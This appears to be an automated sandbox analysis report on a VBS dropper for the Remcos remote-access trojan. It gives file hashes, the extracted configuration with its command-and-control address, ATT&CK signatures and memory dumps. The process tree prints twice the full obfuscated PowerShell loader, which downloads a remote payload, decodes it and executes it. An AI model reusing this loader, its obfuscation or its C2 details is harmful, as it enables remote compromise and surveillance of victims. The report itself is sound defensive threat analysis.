Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13-12-2024 02:46

General

  • Target

    96e58c4ebcebd2972a1f50671fe2c43a89caa4c078767952ddcade51985d4a3f.vbs

  • Size

    62KB

  • MD5

    e6c71bbe4f758fb7c79ac21e9c514977

  • SHA1

    8a491650c20b51b8ccaeb4d76464b01ab1f15ef7

  • SHA256

    96e58c4ebcebd2972a1f50671fe2c43a89caa4c078767952ddcade51985d4a3f

  • SHA512

    e2bc84942acdf9af4afac209f6d3950572eb6eb595e4720cbd3f24e1906a204e4e3fe6867d9d7ecb54166154b5c753662b017c52e3b50c3e38df93bb1c70a59a

  • SSDEEP

    1536:Ddt+UfF7Uvx4GHZg40xnsg07lyODovbB1sRirf5:5MUdq4GGJxszCvbBcirx

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

154.216.18.216:2404

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-7K8JAD

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Remcos family
  • Blocklisted process makes network request 9 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Time Discovery 1 TTPs 2 IoCs

    Adversary may gather the system time and/or time zone settings from a local or remote system.

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\96e58c4ebcebd2972a1f50671fe2c43a89caa4c078767952ddcade51985d4a3f.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4816
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Ndhjlps='Kontinentalsokkel';;$Klauber101='Catadioptrical';;$Marksmen='Kalfaktorens';;$Unlivableness='Limewort';;$Proctoplastic=$host.Name; function Exposes($Kataloger){If ($Proctoplastic) {$Cognacagtigeres='Corollaceous';$Unintelligently103=4;$credoerne=$Unintelligently103}do{$Defeats+=$Kataloger[$credoerne];$credoerne+=5} until(!$Kataloger[$credoerne])$Defeats}function Nonprecipitation225($Civvy){ .($hesperornithid) ($Civvy)}$Underekstremiteten=Exposes 'Le.iNKompESubtt C.e.Depow';$Underekstremiteten+=Exposes 'broneAn eb s mCUntolWaleiSidsefotoNOv rT';$Chemotherapy=Exposes 'NondMTresoEarlzOocyi indlFriglT etakom /';$Valsk=Exposes ' PreTEme lStubsTrag1 tim2';$Gevandterne='E fa[ HulnBraiE G dT V b.DilaSS ereEndarUnruv .reIbeboC fsaETermPSygeO BroiPiroNDuodtBareM CocAWr tN ,ona M.lGAlabea terHols]Augm:Aftv:RigssDekaEN ffCUltrU,tomROut i SmytD ngyMercPDomerU.efOAtriTf,glORaadcNe,roBeyol Fej=Batt$ flav TotARan LSvrls,jreK';$Chemotherapy+=Exposes 'Ca o5 A,b.Sk b0 Xen I,te(DingWelskiRequnDrifdudmaoTmniwGrnssO,by ,oflNBur.TZone Camo1Spur0R ln.Groi0.nth;Sfi actoWBu diHaywnF,rv6G,ni4Skat; G,e ParaxGudf6K.us4A st; opr dionrMic vOmt :F,id1Stor3Nykk1Reca.,prn0Dela) Cen OutG Ap eSrskcDotik NicoA,ou/Ball2Brag0 For1 Leu0Tims0Band1 Sy 0Mamm1Cond PsaFDyreiAndrrEnsleHincfSan o bemxAnal/Myos1Soci3Kalo1Bavl.Derm0';$Erhvervssygdommene=Exposes 'MargUA foSTumieImpornani- DogAImplGFluoE KolnPu.pt';$Ridableness=Exposes 'Miljh Shit nultRubbp vasergs:L.dg/Voci/OutroCutlfWall1Hgt xRedi.CafiiRepocglobuf,ng/Ydrert lbx SerHB llERo kjLin EAn kYPimpEUnde/ChifNDepri D.kc entkUnive Gy.lKri i OveztermaLykktIndbiFusioEtikn Lep.K.nfcKrels No.v';$Samariteruddannelse=Exposes 'Nids>';$hesperornithid=Exposes ' ineIStrue oncx';$Arbejdstilbud216='Delelejligheds';$Stenvindenes49='\huguenotism.Bed';Nonprecipitation225 (Exposes ' Sac$BikagBondlThe O,onoB mpea belLupsl:IleomThomoletmDSubfEev lNFunkHArkie nrDI peESeksROrd NBolseUmedST,as= Kl.$ InkerefrnDeutvd hy:lollATa nP utPl ddDAdelaFod Tb tuaP,ja+Plag$mokeSAdretPr aEnvernHoveVInfri SanNChacdKroeE CooN KameNon Sconc4 Cap9');Nonprecipitation225 (Exposes 'Non $ TecGRentlKuldonondBBe aaFiskL Und:Ko,en oesa.orhRFi ucSmudODepaS HydIM loSIlio=Hove$CrosR opnISupeDTilsaTereB NonlIde e M snForseKanaSInkusTra .dic,sbolip nefLHemaIRifft Ou ( V r$FaldS Coha VarmPrivaOutwrAnneiSto T Apteh,emrmoruUCystD ildBilbA MonNTinsNK.atELoseLMed sClime Rip)');Nonprecipitation225 (Exposes $Gevandterne);$Ridableness=$Narcosis[0];$fike=(Exposes ' Hom$GangGDiscLGensoS ngB MagAEth l.ord:StroTPerivraadINovis Fort.ikrERoerPDipoUDavinIrreKCaritBambE,pitTUng sAden=Encyn ChaEafbeWSkaa-DrifO manBSub.jBredEBaylCK,tttnone TessByggyR glsChaut LeveFdsemSoci.Real$ForsUTidsnInd DVlteE CulRT,laeMillkDiscsIndst BssrUltiEGinnmSmalI,orvtRecae .ilTBesvELiniN');Nonprecipitation225 ($fike);Nonprecipitation225 (Exposes ' F r$R.ilT,eskv Arti RossSp ntO eredonopinf,uAe.enSta kHiggtSliseLoyktImmusBatz. hawHBargeBefra FandForlePlowr P dsBenp[,yds$MallEGra,r Cheh S evKulteSwelrTellv RemsKomps .ury AksgEnerd hino arkmArchmNaboeasshn ndle L n]Symb=Stra$ TilCSa bh rydeGatfm ewoIndgtBronhForbeT ddrSupea stapChesy');$Faerie=Exposes 'Hved$C emTGasavTaariCompsinqutBozaec nvpKarau DiknRe ik Jartteame Rr tSkots ps.TungDPantoFoulwCockn ilgl ParoA enaPit.dKretF I tiCop lstemeEl c(Gath$Ka.tRRabaiFlerdDravaOp pbM dllPar eP lmn At eOomisBattsR ot, fon$LsniEPro.xProjcangie K vpGirrtSinfoSquarFast)';$Exceptor=$Modenhedernes;Nonprecipitation225 (Exposes 'Cerb$I dkgMethlU drO nivBboucAK lvLUnna: LykSProjtUndeaintemSym,cRhodELipol vrtlMisyeMeddROrthnFleaendes=Inse(Rev tNoddE sims Allt Sai- acpAppla.ehjt Br.HC.st Sik$ApotesubrXEnkecToilEWarePTes TCabroDiodR Hes)');while (!$Stamcellerne) {Nonprecipitation225 (Exposes 'Semi$Re.sgHjvelA,tooJo.rbAutoaSu elEnkr:SigvSEmbekSlariPlanfD,bltLandeSweeb SpoeVarmh rapaSignnTestdBn.elBo,tiMystnPolygActis vlv=Slad$Non B Spir Notn InveIndihDrikaUn evAmieeLockpMucidbo kaSalmgGl.woToilgSucreBlocra ganSlokeTears') ;Nonprecipitation225 $Faerie;Nonprecipitation225 (Exposes ' rdeSDrueTBloca,jaeR ol.TT nn-AstrsUnchl ideeD spe SkrPU,gi Ud,o4');Nonprecipitation225 (Exposes ' Bra$ ntgRetslPl toNonpBEddiABes Lmi t:,mpoSTonetArguA Pa MPlascFiniES.aml FeslDeavEKommrPhotn riseFink=Ce.t(Ru.dT.verefylds tanTSkaa- CabpSt,ga uldTlaurH Inc Lys.$Mi.sEA tix N nCRserE verP artUndeOSammRUnr,)') ;Nonprecipitation225 (Exposes ' Cor$PalsgAddilProtoDankBvinyAKbstl R s:ProbJA phe riR KonnCropBlderATuesNRentEvisusT azTRdblAN.leTRokeIKretoKnobNToqu= Sa,$ Sa G Alml Kr.OBrygbSp,ca InaL Dis:reflDFerlI VrdP In,hSkoveOrign .nfH Ergy Ju dCol rLfteAT,lemConciFolkNUanse eps+ Ove+ Sal%a,pr$Ta.lnBrdbaP.arRNonccSkbnOE,nrSRaaki BlosStiv. TilCS inO,angu alln Fo T') ;$Ridableness=$Narcosis[$jernbanestation]}$Radiatory=326426;$Huppahs176=31719;Nonprecipitation225 (Exposes 'Toll$Kempg SublExc O .aabKorsAUdadl Tal:KonfyhebenFremDAutal SvmIVejoN AlrGHjemsKr mOUnd,fEvelfStaneFremr Spr ,amm=Seam L vegM nheronttTran-Obduc RelOAchiNK.dnTFlete lanGomatBedf Pea$ kuleUdstxEm ncEgene,utipWurztAlloOPedar');Nonprecipitation225 (Exposes '.lal$Caddg BonloveroBervbhal a ompl efj:Hy eE N,tkMisasPar.pSkoloamstrMeattStr vSyrurAdumd Sc,iOrph V.s=Va.e Gide[EnwhS Ud yStttsFir tProteVentmSis .cockCErhvo hronRav,v AdveDetor IsotFeed]Squa: His:Hos.FturtrKe.no ommCephBF elaSprnstodaeCadu6Sekh4StvkSV.cutScarrFr,tiPartn oligKrko( Sub$ CupYEs,an T,ddC,arl O,siM linKl ngMisasMegao .omfAbstfFej eS,ovr b g)');Nonprecipitation225 (Exposes 'Bskt$.risGEfteLSubpODaviBMedeAConil,ovi: kovT Ar.a KarlOwlgNNaziEBastTUdviTUfore MowNPlanEMeni Skil= Lac For[geomsAcroYSoljS nmetLu eE Be mKont. esttTilse ennXBobltL se.Konse SygnForfCLsbaoBde DGraiIVmmenC utGFico] la:Phot:TaleAPyrrS rocPaa IBundIUros. .ylgEmpuE Un tUn.ss CenTski rBesgII.den rosG Pee(Gn v$S lfEKhutKKnogsSupppKapioN.ncrFyldT VetV ad rPrisdJernI Teu)');Nonprecipitation225 (Exposes 'Dete$Ex agUnd LtimeoDr kbInglAundelFre,:SexiT NonrUdmaA T lMDiaePGl uAD smgSiddE Syn= Kvl$Mic.tGrasAReadLBootNCaboEBranTsanstStyreoplsnSillEMell.F.thSSulpu F,rbGermS nitTFjelRDistIVrign R kgMon (A sk$UlmorInapAsem,d,phaiMonoaPre TPe soUnexr Amuy ain,Outt$i juHAftauStilp BarpCa,raMundHCyclsTnde1B.dr7 Und6Hema)');Nonprecipitation225 $Trampage;"
      2⤵
      • Blocklisted process makes network request
      • System Time Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4924
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Ndhjlps='Kontinentalsokkel';;$Klauber101='Catadioptrical';;$Marksmen='Kalfaktorens';;$Unlivableness='Limewort';;$Proctoplastic=$host.Name; function Exposes($Kataloger){If ($Proctoplastic) {$Cognacagtigeres='Corollaceous';$Unintelligently103=4;$credoerne=$Unintelligently103}do{$Defeats+=$Kataloger[$credoerne];$credoerne+=5} until(!$Kataloger[$credoerne])$Defeats}function Nonprecipitation225($Civvy){ .($hesperornithid) ($Civvy)}$Underekstremiteten=Exposes 'Le.iNKompESubtt C.e.Depow';$Underekstremiteten+=Exposes 'broneAn eb s mCUntolWaleiSidsefotoNOv rT';$Chemotherapy=Exposes 'NondMTresoEarlzOocyi indlFriglT etakom /';$Valsk=Exposes ' PreTEme lStubsTrag1 tim2';$Gevandterne='E fa[ HulnBraiE G dT V b.DilaSS ereEndarUnruv .reIbeboC fsaETermPSygeO BroiPiroNDuodtBareM CocAWr tN ,ona M.lGAlabea terHols]Augm:Aftv:RigssDekaEN ffCUltrU,tomROut i SmytD ngyMercPDomerU.efOAtriTf,glORaadcNe,roBeyol Fej=Batt$ flav TotARan LSvrls,jreK';$Chemotherapy+=Exposes 'Ca o5 A,b.Sk b0 Xen I,te(DingWelskiRequnDrifdudmaoTmniwGrnssO,by ,oflNBur.TZone Camo1Spur0R ln.Groi0.nth;Sfi actoWBu diHaywnF,rv6G,ni4Skat; G,e ParaxGudf6K.us4A st; opr dionrMic vOmt :F,id1Stor3Nykk1Reca.,prn0Dela) Cen OutG Ap eSrskcDotik NicoA,ou/Ball2Brag0 For1 Leu0Tims0Band1 Sy 0Mamm1Cond PsaFDyreiAndrrEnsleHincfSan o bemxAnal/Myos1Soci3Kalo1Bavl.Derm0';$Erhvervssygdommene=Exposes 'MargUA foSTumieImpornani- DogAImplGFluoE KolnPu.pt';$Ridableness=Exposes 'Miljh Shit nultRubbp vasergs:L.dg/Voci/OutroCutlfWall1Hgt xRedi.CafiiRepocglobuf,ng/Ydrert lbx SerHB llERo kjLin EAn kYPimpEUnde/ChifNDepri D.kc entkUnive Gy.lKri i OveztermaLykktIndbiFusioEtikn Lep.K.nfcKrels No.v';$Samariteruddannelse=Exposes 'Nids>';$hesperornithid=Exposes ' ineIStrue oncx';$Arbejdstilbud216='Delelejligheds';$Stenvindenes49='\huguenotism.Bed';Nonprecipitation225 (Exposes ' Sac$BikagBondlThe O,onoB mpea belLupsl:IleomThomoletmDSubfEev lNFunkHArkie nrDI peESeksROrd NBolseUmedST,as= Kl.$ InkerefrnDeutvd hy:lollATa nP utPl ddDAdelaFod Tb tuaP,ja+Plag$mokeSAdretPr aEnvernHoveVInfri SanNChacdKroeE CooN KameNon Sconc4 Cap9');Nonprecipitation225 (Exposes 'Non $ TecGRentlKuldonondBBe aaFiskL Und:Ko,en oesa.orhRFi ucSmudODepaS HydIM loSIlio=Hove$CrosR opnISupeDTilsaTereB NonlIde e M snForseKanaSInkusTra .dic,sbolip nefLHemaIRifft Ou ( V r$FaldS Coha VarmPrivaOutwrAnneiSto T Apteh,emrmoruUCystD ildBilbA MonNTinsNK.atELoseLMed sClime Rip)');Nonprecipitation225 (Exposes $Gevandterne);$Ridableness=$Narcosis[0];$fike=(Exposes ' Hom$GangGDiscLGensoS ngB MagAEth l.ord:StroTPerivraadINovis Fort.ikrERoerPDipoUDavinIrreKCaritBambE,pitTUng sAden=Encyn ChaEafbeWSkaa-DrifO manBSub.jBredEBaylCK,tttnone TessByggyR glsChaut LeveFdsemSoci.Real$ForsUTidsnInd DVlteE CulRT,laeMillkDiscsIndst BssrUltiEGinnmSmalI,orvtRecae .ilTBesvELiniN');Nonprecipitation225 ($fike);Nonprecipitation225 (Exposes ' F r$R.ilT,eskv Arti RossSp ntO eredonopinf,uAe.enSta kHiggtSliseLoyktImmusBatz. hawHBargeBefra FandForlePlowr P dsBenp[,yds$MallEGra,r Cheh S evKulteSwelrTellv RemsKomps .ury AksgEnerd hino arkmArchmNaboeasshn ndle L n]Symb=Stra$ TilCSa bh rydeGatfm ewoIndgtBronhForbeT ddrSupea stapChesy');$Faerie=Exposes 'Hved$C emTGasavTaariCompsinqutBozaec nvpKarau DiknRe ik Jartteame Rr tSkots ps.TungDPantoFoulwCockn ilgl ParoA enaPit.dKretF I tiCop lstemeEl c(Gath$Ka.tRRabaiFlerdDravaOp pbM dllPar eP lmn At eOomisBattsR ot, fon$LsniEPro.xProjcangie K vpGirrtSinfoSquarFast)';$Exceptor=$Modenhedernes;Nonprecipitation225 (Exposes 'Cerb$I dkgMethlU drO nivBboucAK lvLUnna: LykSProjtUndeaintemSym,cRhodELipol vrtlMisyeMeddROrthnFleaendes=Inse(Rev tNoddE sims Allt Sai- acpAppla.ehjt Br.HC.st Sik$ApotesubrXEnkecToilEWarePTes TCabroDiodR Hes)');while (!$Stamcellerne) {Nonprecipitation225 (Exposes 'Semi$Re.sgHjvelA,tooJo.rbAutoaSu elEnkr:SigvSEmbekSlariPlanfD,bltLandeSweeb SpoeVarmh rapaSignnTestdBn.elBo,tiMystnPolygActis vlv=Slad$Non B Spir Notn InveIndihDrikaUn evAmieeLockpMucidbo kaSalmgGl.woToilgSucreBlocra ganSlokeTears') ;Nonprecipitation225 $Faerie;Nonprecipitation225 (Exposes ' rdeSDrueTBloca,jaeR ol.TT nn-AstrsUnchl ideeD spe SkrPU,gi Ud,o4');Nonprecipitation225 (Exposes ' Bra$ ntgRetslPl toNonpBEddiABes Lmi t:,mpoSTonetArguA Pa MPlascFiniES.aml FeslDeavEKommrPhotn riseFink=Ce.t(Ru.dT.verefylds tanTSkaa- CabpSt,ga uldTlaurH Inc Lys.$Mi.sEA tix N nCRserE verP artUndeOSammRUnr,)') ;Nonprecipitation225 (Exposes ' Cor$PalsgAddilProtoDankBvinyAKbstl R s:ProbJA phe riR KonnCropBlderATuesNRentEvisusT azTRdblAN.leTRokeIKretoKnobNToqu= Sa,$ Sa G Alml Kr.OBrygbSp,ca InaL Dis:reflDFerlI VrdP In,hSkoveOrign .nfH Ergy Ju dCol rLfteAT,lemConciFolkNUanse eps+ Ove+ Sal%a,pr$Ta.lnBrdbaP.arRNonccSkbnOE,nrSRaaki BlosStiv. TilCS inO,angu alln Fo T') ;$Ridableness=$Narcosis[$jernbanestation]}$Radiatory=326426;$Huppahs176=31719;Nonprecipitation225 (Exposes 'Toll$Kempg SublExc O .aabKorsAUdadl Tal:KonfyhebenFremDAutal SvmIVejoN AlrGHjemsKr mOUnd,fEvelfStaneFremr Spr ,amm=Seam L vegM nheronttTran-Obduc RelOAchiNK.dnTFlete lanGomatBedf Pea$ kuleUdstxEm ncEgene,utipWurztAlloOPedar');Nonprecipitation225 (Exposes '.lal$Caddg BonloveroBervbhal a ompl efj:Hy eE N,tkMisasPar.pSkoloamstrMeattStr vSyrurAdumd Sc,iOrph V.s=Va.e Gide[EnwhS Ud yStttsFir tProteVentmSis .cockCErhvo hronRav,v AdveDetor IsotFeed]Squa: His:Hos.FturtrKe.no ommCephBF elaSprnstodaeCadu6Sekh4StvkSV.cutScarrFr,tiPartn oligKrko( Sub$ CupYEs,an T,ddC,arl O,siM linKl ngMisasMegao .omfAbstfFej eS,ovr b g)');Nonprecipitation225 (Exposes 'Bskt$.risGEfteLSubpODaviBMedeAConil,ovi: kovT Ar.a KarlOwlgNNaziEBastTUdviTUfore MowNPlanEMeni Skil= Lac For[geomsAcroYSoljS nmetLu eE Be mKont. esttTilse ennXBobltL se.Konse SygnForfCLsbaoBde DGraiIVmmenC utGFico] la:Phot:TaleAPyrrS rocPaa IBundIUros. .ylgEmpuE Un tUn.ss CenTski rBesgII.den rosG Pee(Gn v$S lfEKhutKKnogsSupppKapioN.ncrFyldT VetV ad rPrisdJernI Teu)');Nonprecipitation225 (Exposes 'Dete$Ex agUnd LtimeoDr kbInglAundelFre,:SexiT NonrUdmaA T lMDiaePGl uAD smgSiddE Syn= Kvl$Mic.tGrasAReadLBootNCaboEBranTsanstStyreoplsnSillEMell.F.thSSulpu F,rbGermS nitTFjelRDistIVrign R kgMon (A sk$UlmorInapAsem,d,phaiMonoaPre TPe soUnexr Amuy ain,Outt$i juHAftauStilp BarpCa,raMundHCyclsTnde1B.dr7 Und6Hema)');Nonprecipitation225 $Trampage;"
    1⤵
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • System Time Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4328
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      PID:4172

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    2d74f3420d97c3324b6032942f3a9fa7

    SHA1

    95af9f165ffc370c5d654a39d959a8c4231122b9

    SHA256

    8937b96201864340f7fae727ff0339d0da2ad23c822774ff8ff25afa2ae4da3d

    SHA512

    3c3d2ae3b2581ff32cfee2aedca706e4eaa111a1f9baeb9f022762f7ef2dfb6734938c39eb17974873ad01a4760889e81a7b45d7ed404eb5830f73eb23737f1a

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vmp0okku.pdr.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\huguenotism.Bed

    Filesize

    466KB

    MD5

    b26527026f5a26ed7babddb7e8d8b340

    SHA1

    773235c6fa1ccb738db217fe387259c8c4f70c79

    SHA256

    4f558a98bcbea1f90ed0f74003698909dcae021ccf2550f0309a7242f8ca7054

    SHA512

    a1a8715881d3e06d7c5d4f1ae552894f811591c0e3beb0caa602cfaea957f67da7ff3850ebd16b31443aad6455f2cc12cb176a0a99c03608806113cf8f0a971a

  • memory/4172-59-0x0000000000AE0000-0x0000000001D34000-memory.dmp

    Filesize

    18.3MB

  • memory/4172-63-0x0000000000AE0000-0x0000000001D34000-memory.dmp

    Filesize

    18.3MB

  • memory/4172-62-0x0000000000AE0000-0x0000000001D34000-memory.dmp

    Filesize

    18.3MB

  • memory/4172-61-0x0000000000AE0000-0x0000000001D34000-memory.dmp

    Filesize

    18.3MB

  • memory/4172-60-0x0000000000AE0000-0x0000000001D34000-memory.dmp

    Filesize

    18.3MB

  • memory/4172-64-0x0000000000AE0000-0x0000000001D34000-memory.dmp

    Filesize

    18.3MB

  • memory/4172-58-0x0000000000AE0000-0x0000000001D34000-memory.dmp

    Filesize

    18.3MB

  • memory/4172-57-0x0000000000AE0000-0x0000000001D34000-memory.dmp

    Filesize

    18.3MB

  • memory/4172-56-0x0000000000AE0000-0x0000000001D34000-memory.dmp

    Filesize

    18.3MB

  • memory/4172-55-0x0000000000AE0000-0x0000000001D34000-memory.dmp

    Filesize

    18.3MB

  • memory/4172-65-0x0000000000AE0000-0x0000000001D34000-memory.dmp

    Filesize

    18.3MB

  • memory/4172-54-0x0000000000AE0000-0x0000000001D34000-memory.dmp

    Filesize

    18.3MB

  • memory/4172-51-0x0000000000AE0000-0x0000000001D34000-memory.dmp

    Filesize

    18.3MB

  • memory/4328-21-0x0000000005EA0000-0x0000000005EC2000-memory.dmp

    Filesize

    136KB

  • memory/4328-33-0x0000000006110000-0x0000000006464000-memory.dmp

    Filesize

    3.3MB

  • memory/4328-39-0x00000000079A0000-0x0000000007A36000-memory.dmp

    Filesize

    600KB

  • memory/4328-40-0x0000000007940000-0x0000000007962000-memory.dmp

    Filesize

    136KB

  • memory/4328-41-0x0000000008BB0000-0x0000000009154000-memory.dmp

    Filesize

    5.6MB

  • memory/4328-37-0x0000000007F80000-0x00000000085FA000-memory.dmp

    Filesize

    6.5MB

  • memory/4328-43-0x0000000009160000-0x000000000BDD4000-memory.dmp

    Filesize

    44.5MB

  • memory/4328-36-0x0000000006770000-0x00000000067BC000-memory.dmp

    Filesize

    304KB

  • memory/4328-35-0x0000000006740000-0x000000000675E000-memory.dmp

    Filesize

    120KB

  • memory/4328-38-0x0000000006CD0000-0x0000000006CEA000-memory.dmp

    Filesize

    104KB

  • memory/4328-23-0x0000000006020000-0x0000000006086000-memory.dmp

    Filesize

    408KB

  • memory/4328-22-0x0000000005F40000-0x0000000005FA6000-memory.dmp

    Filesize

    408KB

  • memory/4328-19-0x00000000051D0000-0x0000000005206000-memory.dmp

    Filesize

    216KB

  • memory/4328-20-0x0000000005840000-0x0000000005E68000-memory.dmp

    Filesize

    6.2MB

  • memory/4924-0-0x00007FFB89CE3000-0x00007FFB89CE5000-memory.dmp

    Filesize

    8KB

  • memory/4924-18-0x00007FFB89CE0000-0x00007FFB8A7A1000-memory.dmp

    Filesize

    10.8MB

  • memory/4924-15-0x00007FFB89CE0000-0x00007FFB8A7A1000-memory.dmp

    Filesize

    10.8MB

  • memory/4924-12-0x00007FFB89CE0000-0x00007FFB8A7A1000-memory.dmp

    Filesize

    10.8MB

  • memory/4924-11-0x00007FFB89CE0000-0x00007FFB8A7A1000-memory.dmp

    Filesize

    10.8MB

  • memory/4924-6-0x000001CA48C10000-0x000001CA48C32000-memory.dmp

    Filesize

    136KB